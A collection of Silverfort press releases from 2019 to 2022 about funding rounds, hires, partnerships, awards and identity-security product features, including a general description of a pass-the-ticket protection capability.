https://www.silverfort.com/press-news/silverfort-raises-65m-series-c-worlds-first-unified-identity-threat-protection-platform/ Led by Greenfield Partners and strategic investors such as General Motors, the new funding will further accelerate the company’s growth to deliver holistic identity security BOSTON & TEL AVIV, April 12, 2022 – Silverfort, provider of the world’s first Unified Identity Threat Protection platform, has closed $65m in Series C funding led by Greenfield Partners, alongside several VC’s and strategic investors, including GM Ventures, Acrew Capital, Vintage Investment Partners and existing investors StageOne Ventures, Singtel Innov8, Citi Ventures, Aspect Ventures and Maor Investments. The new investment, which brings Silverfort’s total funding to over $100m, follows rapid growth which saw Annual Recurring Revenue triple with hundreds of customers - including Fortune 100 companies. The funding will be used to scale the business and team globally and continue to expand the platform’s unique technological advantage. "The company has spent years building a best-in-class platform to solve holistically a growing security problem now gaining mainstream awareness,” said Avery Schwartz, Partner at Greenfield Partners who will join the company’s board of directors. “We are energized both by the positive impact the company's technology is having and by the leadership's vision and passion. It is clear to us that Silverfort's strong momentum in the market is just the start, and we are excited to join them on this journey. " Silverfort delivers Identity Threat Detection and Response (ITDR) and Identity Threat Prevention (ITP) capabilities as a unified layer on top of a customer’s existing Identity and Access Management (IAM) infrastructure, including both modern and legacy solutions, to stop identity-based attacks across the enterprise. Silverfort’s patented technology achieves this in a way that doesn’t require modifications to the customer’s endpoints, servers or applications – a capability which is currently unmatched in the market. It also enables customers to extend security controls such as Multi-Factor Authentication (MFA) from any vendor to previously unsupported resources and environments, or even consolidate their hybrid IAM stack by ‘bridging’ legacy systems and protocols into modern identity platforms like Entra ID (formerly Azure AD). “Identity security can no longer be a ‘feature’ that works in silos within each IAM platform, while leaving many sensitive resources out of scope,” said Hed Kovetz, Silverfort’s Co-Founder and CEO. “This lack of end-to-end identity threat protection has turned identity into today’s #1 attack surface, with compromised credentials being leveraged in 80% of all data breaches and ransomware campaigns. This problem required a new approach to identity security: a unified Zero Trust security layer that works on top of all modern and legacy IAM infrastructure, and covers all users, resources and environments. ” According to Gartner®, in the Top Trends in Cybersecurity 2022 report (February 2022), “Many IAM tools are operating in silos that are not visible to incident responders. Organizations must re-evaluate their IAM infrastructure with a goal of identifying opportunities for detecting compromise and immediately investigating and responding... This year, we are introducing a new term, ’identity threat detection and response’ (ITDR) to describe the collection of tools and best practices to successfully defend identity systems from endemic levels of attacks. ” “We are uniquely positioned to become the leader in ITDR and identity security in general, having spent years building and perfecting our unique platform for this exact purpose,” Kovetz added. “Our agentless and proxyless technology consolidates detection, response and prevention across all IAM platforms - even in places where it was completely missing. Many of our customers have reported cases where the platform detected and stopped account takeover, lateral movement and ransomware propagation attempts. Our approach is already changing the identity security market and will gradually reshape it completely. The numbers speak for themselves: over 90% of those who trial our platform become customers, and we are adding a double-digit number of customers every month. ” Silverfort’s platform also enables customers to protect previously ‘unprotectable’ resources without requiring agents, proxies or application changes. This includes legacy systems, command-line interfaces, industrial OT systems (including air-gapped networks), IT infrastructure, service accounts (machine-to-machine access) and more. “These previously unprotected assets are often viewed as the weakest link in enterprise security,” said Yaron Kassner, Silverfort’s Co-Founder and CTO. “By enabling secure authentication and access to these assets, Silverfort allows companies to close their deepest security gaps, and to comply with regulations and cyber insurance requirements. ” “The need for robust threat protection across the enterprise is more prevalent today than ever before, as traditional network parameters rapidly change and new threats emerge,” said Wade Sheffer, Managing Director, GM Ventures. “Our investment in Silverfort underscores GM Ventures’ commitment to identifying next generation technologies that will enhance a business’ digital enterprise while supporting GM’s transformation to a technology leader and platform innovator. We are optimistic about Silverfort’s growth and believe their technology has the potential to stop future identity-based threats at GM and beyond. ” More information can be found at www. silverfort. com GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U. S. and internationally and is used herein with permission. All rights reserved. About Silverfort Silverfort is the leader in Identity Threat Protection, enabling secure authentication and access in a unified manner across all corporate resources, both on-premises and in the cloud, to detect and stop identity-based attacks including account takeover and ransomware propagation. Using patented technology, Silverfort enforces its protection as a layer on top of the customer’s existing IAM infrastructure, without requiring modifications to endpoints, servers or applications – a capability which is unmatched in the market. This includes resources that couldn’t be protected before, such as legacy applications, command-line interfaces, industrial systems, machine-to-machine access and more. Its platform enables Identity Threat Detection and Response (ITDR), agentless Multi-Factor Authentication (MFA), discovery and protection of service accounts (non-human identities), and adaptive Zero Trust security policies. Silverfort is trusted by hundreds of enterprise customers around the world, including Fortune 100 companies. It has been named a Gartner ‘Cool Vendor’ and received dozens of other industry awards. See a demo to learn more. About Greenfield Partners Greenfield Partners is an investment firm focused on exceptional early growth stage technology businesses. With a dual presence in Tel Aviv and New York, the Greenfield team fuses deep local Israeli roots and an expansive global network to support entrepreneurs in their quest to build thriving technology companies. For more information, please visit http://greenfield-growth. com. Media Contact: Kim Smith Code Red Security PR kim. smith@coderedsecuritypr. co. uk --- - Published: 2021-11-01 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-appoints-drew-schuil-as-chief-revenue-officer/ BOSTON & TEL AVIV, Israel--(BUSINESS WIRE)--Silverfort, the unified identity protection company, today announced the appointment of Drew Schuil as Chief Revenue Officer. Drew has 22 years of enterprise sales experience with leading security vendors including Integris Software (now OneTrust) and Imperva. “Drew is a proven sales leader who has helped drive several early stage security vendors into market leadership positions,” said Hed Kovetz, CEO of Silverfort. “He possesses the right blend of management skills, technical expertise and security industry relationships to help Silverfort capitalize on our unique ability to unify siloed cloud and on-premises identity platforms with a Zero Trust approach. ” Drew joins Silverfort from Integris Software, a privacy and security startup that was acquired by OneTrust in 2020, where he was President and COO. He previously was VP Global Product Strategy at enterprise security vendor Imperva, where he served in several executive sales positions during his 11 year tenure. “Silverfort is addressing one of the biggest challenges for companies that are migrating identity to the cloud and need to protect multiple IAM solutions across hybrid and multi-cloud environments with unified security controls,” said Drew Schuil. “The market opportunity for Silverfort is massive since virtually every organization must find a solution to this problem. I look forward to helping the company rapidly become a market leader in Identity Protection and Zero Trust. ” About Silverfort Silverfort has created a Unified Identity Protection Platform that consolidates security controls across corporate networks and cloud environments to block identity-based attacks. Using innovative agentless and proxyless technology, Silverfort seamlessly integrates with all existing IAM solutions extending their coverage to assets that cannot otherwise be protected including homegrown/legacy applications, IT infrastructure, file systems, command-line tools, machine-to-machine access, and more. It continuously monitors all access by users and service accounts across both cloud and on-premise environments, analyzes risk in real-time using an AI-based engine, and enforces adaptive authentication and access policies. The company has been named a Gartner ‘Cool Vendor’, 451 Research ‘FireStarter’, CNBC ‘Upstart 100’, Citi’s Most Promising Fintech Startups for 2020 in the Cybersecurity Category and Most Promising Cybersecurity Startup of the Year by CDM Magazine. For more information, visit us at https://www. silverfort. com/ and follow us on LinkedIn and Twitter. --- - Published: 2021-08-09 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-partners-with-idsa-to-build-awareness-for-identity-based-zero-trust/ Company will Work with the Identity Defined Security Alliance to Help Organizations Overcome Modern Authentication and Access Management Challenges BOSTON and TEL AVIV, August 9, 2021 – Silverfort, the unified identity protection company, today announced it has joined the Identity Defined Security Alliance (IDSA), a nonprofit that provides vendor-neutral resources to help organizations reduce the risk of a breach by combining identity and security strategies. Silverfort will work with the IDSA on initiatives to inform organizations on the latest security threats and present best practices for implementing an identity-based Zero Trust framework across modern hybrid and multi-cloud infrastructures. “Currently, organizations are managing identity across an array of silos including cloud-native systems and on premise infrastructures like Active Directory. This complexity increases security risk,” said Julie Smith, Executive Director of the IDSA. “We are pleased to have Silverfort join the IDSA and lead discussions on the need to consolidate and orchestrate identity management and threat detection across cloud, hybrid and multi-cloud infrastructures. ” “Implementing identity-based Zero Trust represents the best approach for preventing account takeovers, lateral movement and other attacks that utilize compromised credentials to access resources within enterprises’ on-premises and cloud environments,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “We look forward to working with the IDSA and its membership on initiatives to help organizations unify identity management and decrease risk across their entire attack surface. ” About the Identity Defined Security Alliance The IDSA is a group of identity and security vendors, solution providers, and practitioners that acts as an independent source of thought leadership, expertise, and practical guidance on identity centric approaches to security for technology professionals. The IDSA is a nonprofit that facilitates community collaboration to help organizations reduce risk by providing education, best practices, and resources. For more information visit https://www. idsalliance. org/. About Silverfort Silverfort has created a Unified Identity Protection Platform that consolidates security controls across corporate networks and cloud environments to block identity-based attacks. Using innovative agentless and proxyless technology, Silverfort seamlessly integrates with all existing IAM solutions extending their coverage to assets that cannot otherwise be protected including homegrown/legacy applications, IT infrastructure, file systems, command-line tools, machine-to-machine access, and more. It's an ideal platform for unified access management as it continuously monitors of all access by users and service accounts across both cloud and on-premise environments, analyzes risk in real-time using an AI-based engine, and enforces adaptive authentication and access policies. The company has been named a Gartner ‘Cool Vendor’, 451 Research ‘FireStarter’, CNBC ‘Upstart 100’, Citi’s Most Promising Fintech Startups for 2020 in the Cybersecurity Category and Most Promising Cybersecurity Startup of the Year by CDM Magazine. For more information, visit us at https://www. silverfort. com/ and follow us on LinkedIn and Twitter. Media Contact: Marc Gendron Marc Gendron PR for Silverfort marc@mgpr. net 617. 877. 7480 --- - Published: 2021-07-08 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-introduces-industry-first-prevention-against-pass-the-ticket-attacks/ Until Now, Forged Kerberos Sessions Could Only be Detected Retroactively Boston and Tel Aviv, July 8, 2021 – Silverfort, the unified identity protection company, today released a new protection capability that enables organizations to proactively prevent lateral movement attacks that utilize the Pass the Ticket (PTT) technique. This Kerberos-based exploit could previously only be detected after an attack was carried out. PTT is a post-exploitation method in which attackers compromise or create a valid Kerberos ticket and use it to authenticate to other endpoints and servers in the victim’s environment. It is especially difficult to detect and prevent because Active Directory cannot discern between legitimate and malicious Kerberos authentication tickets. “Pass the Ticket attacks allow hackers to move laterally and undetected within the network because they appear to be performing ‘authorized’ access requests,” said Yaron Kassner, CTO of Silverfort. “Since we have visibility into the full context of each user session, Silverfort is able to distinguish between legitimate and suspicious Kerberos authentication activity. ” Currently, security teams are unable to prevent PTT attacks as they occur and must instead rely on detecting anomalous authentication activity and retracing its origin. Silverfort has developed native integrations with identity directories, including Active Directory, that enables it to monitor, analyze the risk and enforce real time security controls on all access requests. In the case of PTT attacks, Silverfort’s AI-based risk engine will detect that the provided Kerberos ticket is malicious and not part of a legitimate authentication request. Based on the configured policy, Silverfort will instruct Active Directory to either block access or require multi-factor authentication to terminate the attack. ” About Silverfort Silverfort is the provider of the first Unified Identity Protection Platform that consolidates IAM security controls across corporate networks and cloud environments to block identity-based attacks. Using innovative agentless and proxyless technology, Silverfort seamlessly integrates with all IAM solutions, unifies their risk analysis and security controls, and extends their coverage to assets that could not be protected until today, such as homegrown and legacy applications, IT infrastructure, file systems, command-line tools, machine-to-machine access and more. The company has been named a Gartner ‘Cool Vendor’, a 451 Research ‘FireStarter’, and a CNBC ‘Upstart 100’. To learn more visit us on the web, and follow us on LinkedIn and Twitter. Media Contact: Marc Gendron Marc Gendron PR for Silverfort marc@mgpr. net 781. 237. 0341 --- - Published: 2021-06-21 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-ping-identity-unify-rba-across-cloud-hybrid-environment/ Product Integration Provides Comprehensive Visibility and Assessment of Access Activity that Enables Customers to Identify and Respond to Threats Boston and Tel Aviv, June 21, 2021 – Silverfort, the unified identity protection company, today announced that it has joined forces with Ping Identity to help customers unify risk analysis of authentication and access attempts across on-premises and multi-cloud environments to detect and prevent identity-based attacks. According to the Verizon 2021 Data Breach Investigations Report, 61 percent of breaches are attributed to compromised credentials, which is the primary means by which hackers access sensitive data. The integration of the Silverfort platform with PingFederate enables organizations to apply universal risk-based monitoring and assessment of authentication activity for on-premises and cloud environments, and proactively prevent threats. The combined solution also makes it possible to extend identity-based controls to previously unprotected on-premises resources including servers and workstations, homegrown legacy apps, file shares and more. These capabilities can detect advanced attacks in hybrid environments with unmatched accuracy, trigger security policy enforcement and maintain a friction-free user experience. The Silverfort and Ping Identity integration enables customers to implement zero trust identity security while providing seamless authentication experiences for users,” said Loren Russon, VP of Product Management at Ping Identity. “Whether applications are in the cloud, on-premises, federated or hybrid, Ping Identity and Silverfort make it possible to see the true context of authentication with AI-based risk analysis and apply adaptive access policies that defend against identity related security threats. ” “Detecting risky authentication and access requests across hybrid and cloud environments requires a unified approach that can span multiple identity providers and data silos,” said Yaron Kassner, CTO of Silverfort. “The combination of Silverfort and Ping Identity provides the visibility, risk analysis and policy enforcement needed to detect and respond to identity-based threats, while remaining transparent to authorized users. ” The Silverfort-PingFederate integration provides the following benefits: Transparently redirects authentication requests from all applications federated by PingFederate to the Silverfort platform for risk analysis Silverfort evaluates each request based on the full context of the user account, including its recent on-premises authentication and access activity If risky behavior is detected, Silverfort applies an access policy that is enforced across the customer’s entire environment, including on-premises, cloud and multi-cloud Provides protection against lateral movement by attackers across hybrid infrastructures as well as full visibility and an audit trail of each user’s authentication activity On Tuesday, June 22 from 1:30pm - 1:55pm MDT, Yaron Kassner will present a virtual session at the Ping Identity Identiverse conference entitled "Why Lateral Movement is an Identity-Based Attack. Availability The Silverfort and PingFederate solutions are available immediately from Silverfort and Ping Identity, respectively, and their business partners worldwide. About Silverfort Silverfort is the provider of the first Unified Identity Protection Platform that consolidates IAM security controls across corporate networks and cloud environments to block identity-based attacks. Using innovative agentless and proxyless technology, Silverfort seamlessly integrates with all IAM solutions, unifies their risk analysis and security controls, and extends their coverage to assets that could not be protected until today, such as homegrown and legacy applications, IT infrastructure, file systems, command-line tools, machine-to-machine access and more. The company has been named a Gartner ‘Cool Vendor’, a 451 Research ‘FireStarter’, and a CNBC ‘Upstart 100’. To learn more visit us on the web, and follow us on LinkedIn and Twitter. About Ping Identity Ping Identity is the Intelligent Identity solution for the enterprise. We enable companies to achieve Zero Trust identity-defined security and more personalized, streamlined user experiences. The Ping Intelligent Identity™ platform provides customers, workforce, and partners with access to cloud, mobile, SaaS and on-premises applications across the hybrid enterprise. Over 60% of the Fortune 100 choose us for our identity expertise, open standards, and partnerships with companies including Microsoft and Amazon. We provide flexible identity solutions that accelerate digital business initiatives, delight customers, and secure the enterprise through multi-factor authentication, single sign-on, access management, intelligent API security, directory, and data governance capabilities. For more information, visit www. pingidentity. com. Media Contact: Marc Gendron Marc Gendron PR for Silverfort marc@mgpr. net 781. 237. 0341 --- - Published: 2021-03-17 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-microsoft-security-20-20-partner-awards-finalist-identity-trailblazer/ Company’s Unified Identity Protection Platform Consolidates Security Controls for On-Premises and Cloud Environments to Block Attacks Boston and Tel Aviv, March 17, 2021 – Silverfort, the unified identity protection company, today announced it has been named a finalist for the Microsoft Security 20/20 Identity Trailblazer award. The company was honored among a global field of industry leaders for demonstrating excellence in innovation, integration, and customer implementation with Microsoft technology. “Being named a finalist for the Microsoft Security 20/20 Award provides further validation for the value we provide joint customers by unifying identity protection across all their assets,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “Enforcing access management and authentication policies on all resources across hybrid and multi-cloud environments is necessary for implementing Zero Trust security. Silverfort makes this possible by ‘bridging’ any kind of application, server or device into Entra ID (formerly Azure AD), without modifying those assets and without installing proxies. ” The second annual Microsoft Security 20/20 awards to be held May 12, 2021, will celebrate finalists in 18 categories spanning security, compliance, and identity. Silverfort has been nominated as a finalist for Identity Trailblazer. “The pandemic has forever changed our perspective on the world, the role of technology, and how we work, learn, and live,” said Rani Lofstrom, Senior Product Marketing Manager, Microsoft Global Security Partnerships. “In recognition of our new reality, the theme for the Microsoft Security 20/20 Awards this year is ‘Perspective—Through the Looking Glass. ’ The awards ceremony this year will honor our security partners who have gone above and beyond during an unprecedented time of change to support, secure, and protect remote workers everywhere. ” The Microsoft Intelligent Security Association (MISA) was established to help further the security ecosystem, fostering an environment where solution providers can collaborate to create a future that’s safer for people and organizations alike. This year, the industry veterans in MISA will vote to select the winners of the Microsoft Security 20/20 awards, providing an opportunity for colleagues to honor their peers for delivering exceptional work to our shared customers. About Silverfort Silverfort is the provider of the first Unified Identity Protection Platform that consolidates IAM security controls across corporate networks and cloud environments to block identity-based attacks. Using innovative agentless and proxyless technology, Silverfort seamlessly integrates with all IAM solutions, unifies their risk analysis and security controls, and extends their coverage to assets that could not be protected until today, such as homegrown and legacy applications, IT infrastructure, file systems, command-line tools, machine-to-machine access and more. The company has been named a Gartner ‘Cool Vendor’, a 451 Research ‘FireStarter’, and a CNBC ‘Upstart 100’. To learn more visit us on the web, and follow us on LinkedIn and Twitter. Media Contact: Marc Gendron Marc Gendron PR for Silverfort marc@mgpr. net 617. 877. 7480 --- - Published: 2021-03-01 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/unified-identity-protection-for-azure-ad/ Platform Enables Organizations to Centralize Identity and Access Management (IAM) for Cloud and Legacy On-premises Resources on Azure Active Directory, Including Those That Couldn’t be Migrated Before Boston and Tel Aviv, March 2, 2021 – Silverfort, a unified identity protection company and member of the Microsoft Intelligent Security Association (MISA), announced a new offering that enables organizations to consolidate Identity and Access Management for all their devices, applications and environments on Microsoft Entra ID. This new solution is being showcased during a virtual live session at Microsoft Ignite and follows dozens of enterprise customer wins involving Silverfort’s core platform over the past several months. The Silverfort Unified Identity Protection platform allows customers to migrate all their hybrid assets, including non-web systems, into Entra ID (formerly Azure AD) where they can be centrally managed as if they were modern web applications. This enables organizations to unify security policies, visibility and user experience across all systems and environments, including legacy on-premises resources that do not natively support integration with Entra ID (formerly Azure AD) or existing application proxies. “Identity is becoming the primary security control plane for enterprises, but it’s currently built in silos, lacking unified control and leaving many sensitive assets exposed,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “Entra ID provides advanced IAM visibility and security and Silverfort now extends its coverage far beyond any other IAM solution, enabling unified identity protection. We are excited to collaborate with Microsoft on this solution that we think will benefit every enterprise. ” “Microsoft has been on a mission to help companies protect their corporate identities, and take advantage of Entra ID as a universal identity platform for the modern workforce,” said Sue Bohn, Partner Director, Microsoft Identity Division at Microsoft Corp. “The integration with Silverfort allows customers to extend the power and flexibility of Entra ID to many additional resources and applications across hybrid and multi-cloud environments, and unify their identity management and protection on Azure AD. ” Silverfort uses agentless and proxyless technology to seamlessly connect with IAM solutions across hybrid environments, and automatically discovers and analyzes applications and resources, including those that still rely on passwords and legacy protocols. The platform accelerates and optimizes the migration of all applications to cloud-native identity platforms like Entra ID, while serving as a ‘bridge’ for assets that could not be migrated before, such as: Legacy and homegrown applications IT infrastructure Active Directory managed servers and endpoints Assets that reside on other cloud environments, including multi-cloud File shares and databases Command-line tools and other admin interfaces Machine-to-machine access (service accounts) Industrial and medical systems About Silverfort Silverfort is the provider of the first Unified Identity Protection Platform that consolidates IAM security controls across corporate networks and cloud environments to block identity-based attacks. Using innovative agentless and proxyless technology, Silverfort seamlessly integrates with all IAM solutions, unifies their risk analysis and security controls, and extends their coverage to assets that could not be protected until today, such as homegrown and legacy applications, IT infrastructure, file systems, command-line tools, machine-to-machine access and more. The company has been named a Gartner ‘Cool Vendor’, a 451 Research ‘FireStarter’, and a CNBC ‘Upstart 100’. To learn more visit Silverfort. com, and follow us on LinkedIn and Twitter. Media Contact: Marc Gendron Marc Gendron PR for Silverfort marc@mgpr. net 781. 237. 0341 --- - Published: 2021-01-18 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/the-future-of-work-security-and-women-in-tech-2/ Aleta Jeffress (Status Go Episode 3) returns to discuss what’s changed... and what hasn’t changed in the last two years. Aleta is the Vice President of Consulting Services in the State and Local Government sector for CGI. Aleta discusses the heroic efforts many IT departments made in enabling a remote workforce in the new reality of work from home. Security is always top of mind, never more so than in 2020. We explore some of the recent news of the government hacks and what the future may bring in the areas of security and work from home. Aleta also brings us up to date on the work she has been doing to promote women in technology roles, especially in the area of security. Along the way we discuss a couple of interesting start-ups bringing a new perspective to security and to bias in hiring. Discussed in this episode: Future of Work Webinar Silverfort – Next Generation Authentication InterviewIA – AI analysis of interviewing The Future of Work, Security and Women in Tech --- - Published: 2020-08-04 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-secures-30-million-in-series-b-funding/ Boston, Tel Aviv August 4th, 2020 - Silverfort, provider of the industry’s first agentless, proxyless authentication platform, announced today that it has raised $30 million in a Series B investment round. The new funding will allow Silverfort to further accelerate the company’s fast growth and meet the increasing customer demand for secure authentication and access solutions, which is boosted by the global shift to remote work. The financing was led by Aspect Ventures, with participation of Citi Ventures, Maor Investments, and the company’s early investors TLV Partners, StageOne Ventures and Singtel Innov8. Mark Kraynak from Aspect Ventures will be joining Silverfort’s board of directors. This funding round follows a milestone year of growth for Silverfort and brings the total investments in the company to $41. 5 million. “The shift to hybrid and multi-cloud environments, combined with the dramatic acceleration of remote work is driving the need for secure authentication and access of corporate users beyond the perimeter,” said Mark Kraynak, Venture Partner with Aspect Ventures. “Implementing these security controls system-by-system is no longer realistic. Silverfort brings a disruptive technology that is uniquely designed for the perimeter-less era. We are very impressed by the company’s customer traction, leadership and product vision, and excited to help it accelerate its growth. ” “We are proud to support Silverfort as investors, and to see a market leader come out of Citi’s Accelerator program” says Ornit Shinar, Head of Ventures Investments in Citi Israel. “Silverfort's solution has proven not only to be valuable, but in many cases, a necessity. Especially these days, when millions of people around the world have to work and access corporate resources remotely. ” Silverfort developed an innovative platform that seamlessly enforces secure authentication and access policies (including Multi-Factor Authentication, Risk-Based Authentication, Zero Trust and more) for any user, device and system, both on-premises and in the cloud, without the need to deploy any agents, SDKs or proxies. Its unique architecture allows Silverfort to protect large and complex networks and cloud environments in a unified manner, with an AI-driven risk engine that automatically adjusts policies based on the user’s behavior, and prevents threats such as account takeover, ransomware and lateral movement. “With the shift to remote working, secure employee authentication and access to company networks and systems have grown increasingly important for enterprises,” said William Woo, Group CIO at Singtel. “However, many large enterprises find it difficult to implement such controls across all their different environments quickly. Silverfort’s innovative solution simplifies this process without requiring system modifications, enabling them to save time and costs. ” Want to know more? Join us on August 25th for a live webinar introducing Silverfort's Agentless Authentication Platform Silverfort enables its customers to protect many sensitive systems that other vendors can’t integrate with, such as homegrown/legacy systems, critical infrastructure, file systems, IoT, command-line interfaces, machine-to-machine access and more. Silverfort also allows customers to migrate their existing servers and applications to the cloud in a secure manner without having to modify them. “We are thrilled to have the support of such great investors who share our vision”, said Hed Kovetz, CEO and Co-Founder of Silverfort. “The increased enterprise adoption of cloud, IoT, BYOD and remote work is creating major challenges for implementing secure authentication and access, and calls for a more unified approach. We are excited to continue on our mission to help more companies leverage identity as their new perimeter, and effectively prevent emerging cyber threats. ” Silverfort was founded by Hed Kovetz, Yaron Kassner and Matan Fattal, cybersecurity and cryptography experts who previously served in the Israeli 8200 elite cyber unit. It has large enterprise customers around the world, and partnerships with top security vendors and channel partners. This additional funding will allow Silverfort to expand its sales, marketing, engineering and customer success teams around the world. About Silverfort: Silverfort delivers secure authentication and Zero Trust policies across corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables risk-based multi-factor authentication for all sensitive users, devices and resources, including systems that could not be protected until today, such as homegrown applications, IT infrastructure, file systems, machine-to-machine access and more. Silverfort allows organizations to prevent data breaches and achieve compliance, by preventing identity-based attacks across complex, dynamic networks and cloud environments. The company has been named a Gartner ‘Cool Vendor’, a 451 Research ‘FireStarter’, and a CNBC ‘Upstart 100’, and has received worldwide recognition and awards, including Citi’s Most Promising Fintech Startups for 2020 in the Cybersecurity Category, Most Promising Cybersecurity Startup of the Year by CDM Magazine, and more. Contact us to learn more. --- - Published: 2020-05-03 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-breakthrough-in-mfa-hebrew/ In today's new world, where nearly everyone is working remotely, passwords just aren't enough to keep your company’s sensitive assets secure. Check out the full article on Silverfort & CEO, Hed Kovetz, here: --- - Published: 2020-03-10 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/the-silverfort-story-the-next-chapter/ During RSA Conference, we had a chance to connect with Dana Tamir from Silverfort to get the updated Silverfort story. During our chat, Dana points out that enabling secure authentication and zero trust policies without requiring an agent or proxies or software changes should be the primary goal for organizations looking to keep bad actors out while ensuring secure access to those that have been granted authorized access to the business resources. Listen to the podcast --- - Published: 2020-03-05 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/addressing-iam-pain-points-and-security-gaps/ Hed Kovetz of Silverfort Reviews Holistic Agentless Approach to Secure Authentication --- - Published: 2020-02-24 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-named-winner-of-the-coveted-infosec-award-most-promising-cybersecurity-startup-of-the-year-during-rsa-conference-2020/ Silverfort’s Agentless Authentication Platform wins ‘Most Innovative Identity and Access Management’ In 8th Annual InfoSec Awards at #RSAC 2020 SAN FRANCISCO (PRWEB),Feb. 24, 2020 — Silverfort, provider of agentless secure authentication platform, is proud to announce we have won the following awards from Cyber Defense Magazine (CDM), the industry’s leading electronic information security magazine: Most Promising Cybersecurity Startup of the Year Most Innovative Identity and Access Management “We’re thrilled to receive one of the most prestigious and coveted cybersecurity awards in the world from Cyber Defense Magazine. We knew the competition would be tough and fierce. We couldn’t be more pleased to be recognized as Infosec Innovators and leaders in the industry,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “Silverfort embodies three major features the judges look for to become winners: understanding tomorrow’s threats, today, providing a cost-effective solution and innovating in unexpected ways that can help stop the next breach,” said Gary S. Miliefsky, Publisher of Cyber Defense Magazine. We’re thrilled to be a member on this coveted group of winners, located here: http://www. cyberdefenseawards. com/ Please join us at #RSAC RSA Conference 2020, https://www. rsaconference. com/usa today, as we share our red carpet experience and proudly display our trophy at Booth #1553 in South Hall. About Silverfort Silverfort delivers secure authentication and Zero Trust across corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables risk-based multi-factor authentication for all sensitive users, devices and resources, including systems that could not be protected until today, such as homegrown applications, IT infrastructure, file systems, machine-to-machine access and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks across complex, dynamic networks and cloud environments. The company has been named a CNBC ‘Upstart 100’, Gartner ‘Cool Vendor’, a 451 Research ‘FireStarter’, and received worldwide recognition, including the Most Innovative Adaptive Authentication InfoSec Award 2019, InfoSecurity 2018 Global Excellence Awards for Best Authentication Product, and is a gold winner of the Cybersecurity Excellence Awards in the Multi-Factor Authentication category. Contact us to learn more. About CDM InfoSec Awards This is Cyber Defense Magazine’s eighth year of honoring InfoSec innovators. Our submission requirements are for any startup, early stage, later stage or public companies in the INFORMATION SECURITY (INFOSEC) space who believe they have a unique and compelling value proposition for their product or service. Learn more at www. cyberdefenseawards. com About the Judging The judges are CISSP, FMDHS, CEH, certified security professionals who voted based on their independent review of the company submitted materials on the website of each submission including but not limited to data sheets, white papers, product literature and other market variables. CDM has a flexible philosophy to find more innovative players with new and unique technologies, than the one with the most customers or money in the bank. CDM is always asking “What’s Next? ” so we are looking for Next Generation InfoSec Solutions. About Cyber Defense Magazine With over 5 Million monthly readers and growing, and over 17,000 pages of searchable online infosec content, Cyber Defense Magazine and our sister magazine being announced after the show is the premier source of IT Security information. We are managed and published by and for ethical, honest, passionate information security professionals. Our mission is to share cutting-edge knowledge, real-world stories and awards on the best ideas, products and services in the information technology industry. We deliver electronic magazines every month online for free, and special editions exclusively for the RSA Conferencs. CDM is a proud member of the Cyber Defense Media Group, a division of Ingersoll Lockwood. Learn more about us at http://www. cyberdefensemagazine. com and visit http://www. cyberdefensetv. com and http://www. cyberdefenseradio. com to see and hear some of the most informative interviews of many of these winning company executives. --- - Published: 2019-12-17 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-recognized-as-a-microsoft-security-20-20-partner-awards-finalist-for-emerging-isv-disruptor/ BOSTON, MA and Tel Aviv, Israel Dec. 17, 2019 — Silverfort today announced it has been named a finalist in the Microsoft Security 20/20 Partner award. The company was honored among a global field of top Microsoft partners for demonstrating excellence in innovation, integration, and customer implementation with Microsoft technology. “We are honored by this recognition, and excited to be working with Microsoft to enable secure authentication and access in the perimeterless cloud era,”, said Hed Kovetz, Co-Founder and CEO of Silverfort. “In our current reality, enterprises can no longer secure assets one-by-one, or rely solely on perimeter-based security solutions. Silverfort seamlessly extends Microsoft’s identity products to any type of asset, across dynamic hybrid environments, without requiring any agents or proxies. By leveraging our powerful integrations and thanks to the Microsoft Co-Sell Partner Program, we enable companies around the world to migrate their existing assets securely to the cloud, without making changes to their systems or networks. ” At the inaugural Microsoft Security 20/20 partner awards, we will celebrate finalists in 16 categories that span security integration partners, system integrators and managed security service providers. Silverfort has been nominated as a finalist for Emerging ISV Disruptor. “The themes for the new Microsoft Security 20/20 partner awards are vision and clarity. Microsoft Security is focused on protecting our customers and there is no vision for the future that doesn’t involve security partners,” said Rob Lefferts, CVP, Microsoft Threat Protection. “We are hosting the first Microsoft Security 20/20 partner awards gala to honor security partners that are making an impact through technology development and customer enablement. ” Only through collaborations can organizations help customers get clarity and become more secure. The security ecosystem must work together to create a vision for the future where people, information, and companies are made safer. Microsoft Security 20/20 provides an opportunity to honor Microsoft partners that have developed and delivered exceptional Microsoft-based solutions and services during the past year. About Silverfort Silverfort delivers secure authentication and Zero Trust across corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables risk-based multi-factor authentication for all sensitive users, devices and resources, including systems that could not be protected until today, such as homegrown applications, IT infrastructure, file systems, machine-to-machine access and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks across complex, dynamic networks and cloud environments. The company has been named a CNBC ‘Upstart 100’, Gartner ‘Cool Vendor’, a 451 Research ‘FireStarter’, and received worldwide recognition, including the Most Innovative Adaptive Authentication InfoSec Award 2019, InfoSecurity 2018 Global Excellence Awards for Best Authentication Product, and is a gold winner of the Cybersecurity Excellence Awards in the Multi-Factor Authentication category. Contact us to learn more. Product or service names mentioned herein may be the 